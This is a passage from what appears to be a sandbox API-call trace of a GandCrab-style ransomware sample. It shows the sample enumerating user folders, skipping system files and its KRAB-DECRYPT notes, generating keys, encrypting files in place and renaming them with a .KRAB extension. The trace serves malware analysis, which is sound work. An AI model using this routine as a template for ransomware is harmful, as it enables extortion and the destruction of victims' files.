(lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0085.066] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0085.066] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.067] FindNextFileW (in: hFindFile=0x1023138, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0085.067] FindClose (in: hFindFile=0x1023138 | out: hFindFile=0x1023138) returned 1 [0085.067] CloseHandle (hObject=0x43c) returned 1 [0085.067] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.067] lstrcmpW (lpString1="profiles.ini", lpString2=".") returned 1 [0085.067] lstrcmpW (lpString1="profiles.ini", lpString2="..") returned 1 [0085.067] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="profiles.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0085.067] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.067] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.KRAB") returned 71 [0085.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 66 [0085.068] lstrlenW (lpString=".ini") returned 4 [0085.068] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.068] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0085.068] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 66 [0085.068] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 66 [0085.068] lstrcmpiW (lpString1="profiles.ini", lpString2="desktop.ini") returned 1 [0085.068] lstrcmpiW (lpString1="profiles.ini", lpString2="autorun.inf") returned 1 [0085.068] lstrcmpiW (lpString1="profiles.ini", lpString2="ntuser.dat") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="iconcache.db") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="bootsect.bak") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="boot.ini") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="ntuser.dat.log") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="thumbs.db") returned -1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="KRAB-DECRYPT.html") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="ntldr") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="NTDETECT.COM") returned 1 [0085.069] lstrcmpiW (lpString1="profiles.ini", lpString2="Bootfont.bin") returned 1 [0085.069] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.069] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010bd8) returned 1 [0085.110] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.111] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.111] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.111] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0085.111] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0085.111] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.111] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10111b0) returned 1 [0085.113] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.113] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.113] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.113] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0085.113] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0085.113] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.114] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10114e0) returned 1 [0085.115] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x1023338) returned 1 [0085.115] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0085.115] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0085.116] GetLastError () returned 0x0 [0085.116] CryptDestroyKey (hKey=0x1023338) returned 1 [0085.116] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0085.116] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011018) returned 1 [0085.118] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10231f8) returned 1 [0085.118] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0085.118] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0085.118] GetLastError () returned 0x0 [0085.118] CryptDestroyKey (hKey=0x10231f8) returned 1 [0085.118] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0085.118] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0085.119] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.119] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.119] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x7a, lpOverlapped=0x0) returned 1 [0085.145] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffff86, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.145] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x7a, lpOverlapped=0x0) returned 1 [0085.151] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0085.151] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.155] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.155] CloseHandle (hObject=0x43c) returned 1 [0085.155] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.156] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.krab")) returned 1 [0085.163] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.163] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0085.163] FindClose (in: hFindFile=0x10234f8 | out: hFindFile=0x10234f8) returned 1 [0085.163] CloseHandle (hObject=0x474) returned 1 [0085.163] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.163] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0085.163] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0085.164] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\KRAB-DECRYPT.txt" [0085.164] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.164] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\KRAB-DECRYPT.txt.KRAB") returned 67 [0085.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\KRAB-DECRYPT.txt") returned 62 [0085.164] lstrlenW (lpString=".txt") returned 4 [0085.164] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.165] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0085.165] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.165] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\KRAB-DECRYPT.txt") returned 62 [0085.165] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\KRAB-DECRYPT.txt") returned 62 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0085.165] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0085.165] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.166] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0085.166] FindClose (in: hFindFile=0x1023378 | out: hFindFile=0x1023378) returned 1 [0085.166] CloseHandle (hObject=0x3a8) returned 1 [0085.166] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.166] lstrcmpW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2=".") returned 1 [0085.166] lstrcmpW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="..") returned 1 [0085.166] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="oKgFkjyaPeGD29Ljhr.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx" [0085.166] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.167] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx.KRAB") returned 66 [0085.167] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx") returned 61 [0085.167] lstrlenW (lpString=".docx") returned 5 [0085.167] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.167] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0085.167] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx") returned 61 [0085.168] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx") returned 61 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="desktop.ini") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="autorun.inf") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="ntuser.dat") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="iconcache.db") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="bootsect.bak") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="boot.ini") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="ntuser.dat.log") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="thumbs.db") returned -1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="ntldr") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="NTDETECT.COM") returned 1 [0085.168] lstrcmpiW (lpString1="oKgFkjyaPeGD29Ljhr.docx", lpString2="Bootfont.bin") returned 1 [0085.168] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.169] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0085.170] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.172] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.173] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.173] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.173] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.173] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.173] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0085.175] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.175] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.175] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.175] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.175] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.175] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.176] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010a40) returned 1 [0085.177] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10230f8) returned 1 [0085.177] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.177] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.178] GetLastError () returned 0x0 [0085.178] CryptDestroyKey (hKey=0x10230f8) returned 1 [0085.178] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0085.178] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10112c0) returned 1 [0085.179] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10234f8) returned 1 [0085.179] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.180] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.180] GetLastError () returned 0x0 [0085.181] CryptDestroyKey (hKey=0x10234f8) returned 1 [0085.181] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0085.181] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\okgfkjyapegd29ljhr.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.181] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.181] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.182] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x110b3, lpOverlapped=0x0) returned 1 [0085.197] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffeef4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.197] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x110b3, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x110b3, lpOverlapped=0x0) returned 1 [0085.198] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.198] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.202] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.202] CloseHandle (hObject=0x3a8) returned 1 [0085.203] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.203] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\okgfkjyapegd29ljhr.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\oKgFkjyaPeGD29Ljhr.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\okgfkjyapegd29ljhr.docx.krab")) returned 1 [0085.206] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.206] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.206] lstrcmpW (lpString1="Q3cSByRSxfl L.bmp", lpString2=".") returned 1 [0085.207] lstrcmpW (lpString1="Q3cSByRSxfl L.bmp", lpString2="..") returned 1 [0085.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Q3cSByRSxfl L.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp" [0085.207] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.207] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp.KRAB") returned 60 [0085.207] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp") returned 55 [0085.207] lstrlenW (lpString=".bmp") returned 4 [0085.207] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.207] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0085.208] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp") returned 55 [0085.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp") returned 55 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="desktop.ini") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="autorun.inf") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="ntuser.dat") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="iconcache.db") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="bootsect.bak") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="boot.ini") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="ntuser.dat.log") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="thumbs.db") returned -1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="ntldr") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="NTDETECT.COM") returned 1 [0085.208] lstrcmpiW (lpString1="Q3cSByRSxfl L.bmp", lpString2="Bootfont.bin") returned 1 [0085.209] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.209] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010f08) returned 1 [0085.210] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.211] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.211] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.211] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x20, pbBuffer=0x338ef4c | out: 